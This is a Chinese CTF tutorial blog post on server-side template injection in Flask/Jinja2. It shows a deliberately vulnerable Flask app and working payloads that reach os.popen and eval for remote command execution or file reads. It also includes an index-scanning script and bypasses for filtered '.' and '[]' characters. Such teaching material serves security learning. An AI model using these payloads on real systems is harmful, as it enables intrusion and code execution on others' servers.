<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>ctfshow-SSTI - D1anash1ba&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="D1anash1ba&#039;s Blog"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="D1anash1ba&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="SSTI模板注入参考文档SSTI进阶：https:&amp;#x2F;&amp;#x2F;blog.csdn.net&amp;#x2F;miuzzx&amp;#x2F;article&amp;#x2F;details&amp;#x2F;110220425 SSTI入门SSTI，服务端模板注入，其实也就是模板引擎+注入，那么我们首先需要了解一下模板引擎。 模板只是一种提供给程序来解析的一种语法，通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将塞进去的东西生成 html 的文本，返回给浏览器，这样做的好处"><meta property="og:type" content="blog"><meta property="og:title" content="ctfshow-SSTI"><meta property="og:url" content="https://dianashiba.github.io/2023/07/29/SSTI/"><meta property="og:site_name" content="D1anash1ba&#039;s Blog"><meta property="og:description" content="SSTI模板注入参考文档SSTI进阶：https:&amp;#x2F;&amp;#x2F;blog.csdn.net&amp;#x2F;miuzzx&amp;#x2F;article&amp;#x2F;details&amp;#x2F;110220425 SSTI入门SSTI，服务端模板注入，其实也就是模板引擎+注入，那么我们首先需要了解一下模板引擎。 模板只是一种提供给程序来解析的一种语法，通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将塞进去的东西生成 html 的文本，返回给浏览器，这样做的好处"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="e:/Blog/source_posts/img/image-20230819145726677.png"><meta property="article:published_time" content="2023-07-29T09:17:46.000Z"><meta property="article:modified_time" content="2023-12-27T14:37:23.692Z"><meta property="article:author" content="D1anash1ba"><meta property="article:tag" content="Web"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="e:/Blog/source_posts/img/image-20230819145726677.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://dianashiba.github.io/2023/07/29/SSTI/"},"headline":"ctfshow-SSTI","image":["e:/Blog/source_posts/img/image-20230819145726677.png"],"datePublished":"2023-07-29T09:17:46.000Z","dateModified":"2023-12-27T14:37:23.692Z","author":{"@type":"Person","name":"D1anash1ba"},"publisher":{"@type":"Organization","name":"D1anash1ba's Blog","logo":{"@type":"ImageObject","url":"https://dianashiba.github.io/img/logo.svg"}},"description":"SSTI模板注入参考文档SSTI进阶：https:&#x2F;&#x2F;blog.csdn.net&#x2F;miuzzx&#x2F;article&#x2F;details&#x2F;110220425 SSTI入门SSTI，服务端模板注入，其实也就是模板引擎+注入，那么我们首先需要了解一下模板引擎。 模板只是一种提供给程序来解析的一种语法，通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将塞进去的东西生成 html 的文本，返回给浏览器，这样做的好处"}</script><link rel="canonical" href="https://dianashiba.github.io/2023/07/29/SSTI/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.1.1"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="D1anash1ba&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2023-07-29T09:17:46.000Z" title="2023/7/29 17:17:46">2023-07-29</time>发表</span><span class="level-item"><time dateTime="2023-12-27T14:37:23.692Z" title="2023/12/27 22:37:23">2023-12-27</time>更新</span><span class="level-item">20 分钟读完 (大约2966个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">ctfshow-SSTI</h1><div class="content"><h1 id="SSTI模板注入"><a href="#SSTI模板注入" class="headerlink" title="SSTI模板注入"></a>SSTI模板注入</h1><h2 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h2><p>SSTI进阶：<a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/110220425">https://blog.csdn.net/miuzzx/article/details/110220425</a></p>
<h2 id="SSTI入门"><a href="#SSTI入门" class="headerlink" title="SSTI入门"></a>SSTI入门</h2><p>SSTI，服务端模板注入，其实也就是模板引擎+注入，那么我们首先需要了解一下模板引擎。</p>
<p>模板只是一种提供给程序来解析的一种语法，通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将塞进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数据快，大大提升效率。</p>
<p>常见的模板引擎如下</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP: Smarty, Twig, Blade</span><br><span class="line">JAVA: JSP, FreeMarker, Velocity</span><br><span class="line">Python: Jinja2, django, tornado</span><br></pre></td></tr></table></figure>

<h2 id="Flask框架"><a href="#Flask框架" class="headerlink" title="Flask框架"></a>Flask框架</h2><p>Flask框架使用的模板是Jinja2，在给出模板渲染代码之前，我们先在本地构造一个html界面作为模板，也就是模板渲染代码的相同位置下，有一个名<code>templates</code>的文件夹，在里面写入一个index.html文件，内容如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>SSTI<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h3</span>&gt;</span>Hello,&#123;&#123;name&#125;&#125;!<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

"{{}}"中的name即为需要渲染的变量，此时我们写我们的模板渲染代码(app.py)，内容如下：

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> *</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    query = request.args.get(<span class="string">&quot;name&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, name = query)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(port = <span class="number">1211</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>Get方式提交参数?name&#x3D;Diana运行即可</p>
<h2 id="SSTI成因"><a href="#SSTI成因" class="headerlink" title="SSTI成因"></a>SSTI成因</h2><p>如果程序员偷懒，把两个文件合并到一个文件中，就会导致SSTI注入漏洞</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,request,render_template_string</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    name = request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">    template = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">&lt;html&gt;</span></span><br><span class="line"><span class="string">  &lt;head&gt;</span></span><br><span class="line"><span class="string">    &lt;title&gt;SSTI&lt;/title&gt;</span></span><br><span class="line"><span class="string">  &lt;/head&gt;</span></span><br><span class="line"><span class="string"> &lt;body&gt;</span></span><br><span class="line"><span class="string">      &lt;h3&gt;Hello, %s !&lt;/h3&gt;</span></span><br><span class="line"><span class="string">  &lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;</span></span><br><span class="line"><span class="string">        &#x27;&#x27;&#x27;</span>% (name)</span><br><span class="line">    <span class="keyword">return</span> render_template_string(template)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;0.0.0.0&quot;</span>, port=<span class="number">5000</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>此时如果传入?name&#x3D;21则会出现</p>
<p>这是因为"{{}}"包裹的内容会被渲染，3*7被当作了一个python表达式进行计算，计算的结果被格式化输出到%s处，最后导致显示结果为Hello，21！</p>
<h2 id="Python语法知识"><a href="#Python语法知识" class="headerlink" title="Python语法知识"></a>Python语法知识</h2><h3 id="SSTI中可能用到的语法知识"><a href="#SSTI中可能用到的语法知识" class="headerlink" title="SSTI中可能用到的语法知识"></a>SSTI中可能用到的语法知识</h3><p>下划线包裹的是魔术方法</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">__class__           查看对象所在的类</span><br><span class="line">__mro__             查看继承关系和调用顺序，返回元组</span><br><span class="line">__base__            返回基类</span><br><span class="line">__bases__           返回基类元组(Tuple)</span><br><span class="line">__subclasses__()    返回子类列表(List)</span><br><span class="line">__init__            调用初始化函数，可以用来跳到__globals__</span><br><span class="line">__globals__         返回函数所在的全局命名空间所定义的全局变量，返回字典</span><br><span class="line">__builtins__        返回内建内建名称空间字典</span><br><span class="line">__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里</span><br><span class="line">__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如:a.xxx/a.xxx()）都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。</span><br><span class="line">__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a[&#x27;b&#x27;]，就是a.__getitem__(&#x27;b&#x27;)</span><br><span class="line">__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。</span><br><span class="line">__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()]</span><br><span class="line">__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。</span><br><span class="line">url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__[&#x27;__builtins__&#x27;]含有current_app</span><br><span class="line">get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__[&#x27;__builtins__&#x27;]含有current_app</span><br><span class="line">lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">&#123;&#123;cycler.__init__.__globals__.os.popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">current_app          应用上下文，一个全局变量</span><br><span class="line">request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取ope函数:request.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/proc\self\fd/3&#x27;).read()</span><br><span class="line">request.args.x1   	 get传参</span><br><span class="line">request.values.x1 	 所有参数</span><br><span class="line">request.cookies      cookies参数</span><br><span class="line">request.headers      请求头参数</span><br><span class="line">request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)</span><br><span class="line">request.data  		 post传参	(Content-Type:a/b)</span><br><span class="line">request.json		 post传json  (Content-Type: application/json)</span><br><span class="line">config               当前application的所有配置。此外，也可以这样&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read() &#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Jinja2一些语句"><a href="#Jinja2一些语句" class="headerlink" title="Jinja2一些语句"></a>Jinja2一些语句</h3>"{%%}"可以用来声明变量，也可以用于循环语句和条件语句

<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!---test.html---&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    条件语句和循环语句</span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    &#123;% for i in [&#x27;Ava&#x27;, &#x27;Bella&#x27;, &#x27;Diana&#x27;, &#x27;Elieen&#x27;] %&#125;</span><br><span class="line">        &#123;% if i in user %&#125;</span><br><span class="line">            <span class="tag">&lt;<span class="name">h3</span>&gt;</span>Hello, &#123;&#123;i&#125;&#125;!<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">        &#123;% else %&#125;</span><br><span class="line">            <span class="tag">&lt;<span class="name">h3</span>&gt;</span>There is no user &#x27;&#123;&#123;i&#125;&#125;&#x27;<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">        &#123;% endif %&#125;</span><br><span class="line">    &#123;% endfor %&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># app.py</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,render_template</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">test</span>():</span><br><span class="line">    user = [<span class="string">&quot;Ava&quot;</span>, <span class="string">&quot;Diana&quot;</span>]</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;test.html&#x27;</span>, user = user)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(port=<span class="number">1211</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<h3 id="一些可能会用到的函数"><a href="#一些可能会用到的函数" class="headerlink" title="一些可能会用到的函数"></a>一些可能会用到的函数</h3><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">length():获取一个序列或者字典的长度并将其返回</span><br><span class="line"></span><br><span class="line">int()：将值转换为int类型；</span><br><span class="line"></span><br><span class="line">float()：将值转换为float类型；</span><br><span class="line"></span><br><span class="line">lower()：将字符串转换为小写；</span><br><span class="line"></span><br><span class="line">upper()：将字符串转换为大写；</span><br><span class="line"></span><br><span class="line">reverse()：反转字符串；</span><br><span class="line"></span><br><span class="line">replace(value,old,new)： 将value中的old替换为new</span><br><span class="line"></span><br><span class="line">list()：将变量转换为列表类型；</span><br><span class="line"></span><br><span class="line">string()：将变量转换成字符串类型；</span><br><span class="line"></span><br><span class="line">join()：将一个序列中的参数值拼接成字符串,通常有python内置的dict()配合使用</span><br><span class="line"></span><br><span class="line">attr(): 获取对象的属性</span><br><span class="line">关于attr:</span><br><span class="line">官方解释：foo|attr(&quot;bar&quot;) 等效于 foo[&quot;bar&quot;] </span><br></pre></td></tr></table></figure>

<p>管道符号可以参考官方文档：<a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#filters">https://jinja.palletsprojects.com/en/3.0.x/templates/#filters</a></p>
<h2 id="Payload构造"><a href="#Payload构造" class="headerlink" title="Payload构造"></a>Payload构造</h2><p>第一步：查找基类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&quot;</span>.__class__.__mro__[-<span class="number">1</span>]</span><br><span class="line"><span class="comment"># 直到出现&lt;class &#x27;object&#x27;&gt;</span></span><br></pre></td></tr></table></figure>

<p>第二步：查找基类的子类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__mro__[-<span class="number">1</span>].__subclasses__()&#125;&#125;</span><br><span class="line"><span class="comment"># 此时会出现大量子类</span></span><br></pre></td></tr></table></figure>

<h3 id="os-wrap-close类"><a href="#os-wrap-close类" class="headerlink" title="os._wrap_close类"></a><code>os._wrap_close</code>类</h3><p>大多数情况下，我们会利用<code>&lt;class os._wrap_close&gt;</code>这个类</p>
<p>可以用以下脚本来查找下标，具体视情况更改脚本内容</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&#x27;User-Agent&#x27;</span>:<span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36&#x27;</span>&#125;</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    url = <span class="string">&quot;http://127.0.0.1:5000/?name=\</span></span><br><span class="line"><span class="string">        &#123;&#123;().__class__.__bases__[0].__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;]&#125;&#125;&quot;</span></span><br><span class="line">    res = requests.get(url=url, headers=headers)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;os._wrap_close&#x27;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">        <span class="built_in">print</span>(i)</span><br></pre></td></tr></table></figure>

<p>接下来我们利用<code>&lt;class os._wrap_close&gt;</code>这个类中的<code>popen</code>方法。</p>
<p>调用<code>__init__</code>方法初始化类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>然后使用<code>__global__</code>方法获取以字典形式返回的方法和属性</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;cmd&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>cmd即为需要执行的命令，实现rce。</p>
<p><code>popen</code>:<a target="_blank" rel="noopener" href="https://blog.csdn.net/Z_Stand/article/details/89375589">https://blog.csdn.net/Z_Stand/article/details/89375589</a></p>
<h3 id="builtins-模块"><a href="#builtins-模块" class="headerlink" title="__builtins__模块"></a><code>__builtins__</code>模块</h3><p>还有一个常用的模块就是<code>__builtins__</code>,它里面有<code>eval() open()</code>等函数，我们可以也利用它来进行RCE</p>
<p>它的payload是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cmd&#x27;).read()&quot;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;x.__init__.__globals__.__builtins__.<span class="built_in">eval</span>(request.cookies.a)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="读取文件的payload"><a href="#读取文件的payload" class="headerlink" title="读取文件的payload"></a>读取文件的payload</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;app.py&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cmd&#x27;).read()&quot;</span>)&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<h2 id="SSTI常见的绕过方式"><a href="#SSTI常见的绕过方式" class="headerlink" title="SSTI常见的绕过方式"></a>SSTI常见的绕过方式</h2><h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过."></a>绕过<code>.</code></h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>用[]代替.</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125; 等价于 &#123;&#123;<span class="string">&quot;&quot;</span>[<span class="string">&#x27;__class__&#x27;</span>]&#125;&#125;</span><br><span class="line"><span class="number">2.</span>用attr()过滤器代替</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125; 等价于 &#123;&#123;<span class="string">&quot;&quot;</span>|attr(<span class="string">&#x27;__class__&#x27;</span>)&#125;&#125;</span><br><span class="line"><span class="comment">#关于attr:</span></span><br><span class="line"><span class="comment">#官方解释：foo|attr(&quot;bar&quot;) 等效于 foo[&quot;bar&quot;] </span></span><br><span class="line"><span class="comment">#         lipsum | attr(&#x27;__globals__&#x27;) 等价于 lipsum.__globals__</span></span><br></pre></td></tr></table></figure>

<h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过[]"></a>绕过<code>[]</code></h3><p>可以使用<code>__getitem__</code>方法，用()代替[]</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">__bases__[<span class="number">0</span>] 等价于 __bases__.__getitem__(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># 利用下面payload可以避免使用中括号</span></span><br><span class="line">&#123;&#123;.__init__.__globals__.__builtins__.<span class="built_in">eval</span>(request.cookies.a)&#125;&#125;</span><br></pre></td></tr></table></figure>

